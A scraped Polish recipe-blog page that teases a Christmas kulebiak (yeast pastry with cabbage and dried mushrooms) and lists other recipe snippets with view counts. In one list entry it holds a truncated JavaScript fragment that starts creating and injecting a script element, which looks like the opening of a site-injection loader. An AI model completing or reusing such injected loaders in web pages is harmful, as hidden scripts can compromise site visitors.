Kulebiak
Źródło: https://www.mecooks.pl/pieczywo/kulebiak/
Kulebiak to ciasto drożdżowe nadziewane kapustą lub mięsem. Jest on idealnym dodatkiem do barszczu czerwonego i śmiało zastąpić nim można paszteciki bądź krokiety. Kulebiak wigilijny, którego nadzienie poza kapustą zawiera również suszone grzyby, to moja propozycja na dodatek do barszczu czerwonego, który podać można w nadchodzące Święta. Ciasto drożdżowe w tymże kulebiaku jest puszyste, lekkie… The post Kulebiak appeared first on MeCooks Blog.
Najnowsze przepisy
(function(){ zz99=document.createElement("script");zz99_=("o ⇖ 16
Proste połączenie ale zdecydowanie zawsze się sprawdza.... ⇖ 32
Miodownik bez jajek – mięciutki, puszysty i pięknie... ⇖ 27
Pyszny przepis na noodle z mięsem mielonym. Szybki,... ⇖ 24
Wyobraź sobie ten moment: wyjmujesz z piekarnika idealną... ⇖ 15
Przepisy z bloga
Jajka po turecku to danie, którego koniecznie musicie... ⇖ 55
Ubita feta to puszysty i delikatny dip, który doskonale... ⇖ 56
Pyszny obiad bezmięsny czyli makaron z sosem z pieczonych... ⇖ 60
Maślane drożdżówki z serem ricotta i figami to wytrawny... ⇖ 91
Przepisy na czasie
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 359
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 268
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 213
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 191
Tulipany do barszczyku to znakomita propozycja podania... ⇖ 171
Pyszny miodownik z kakaową masą grysikową i z orzechami... ⇖ 152
Idealne danie na ciepło na imprezy, lub na obiad. Przepis... ⇖ 72
Domowe pralinki są smaczne, łatwe do zrobienia i... ⇖ 68









































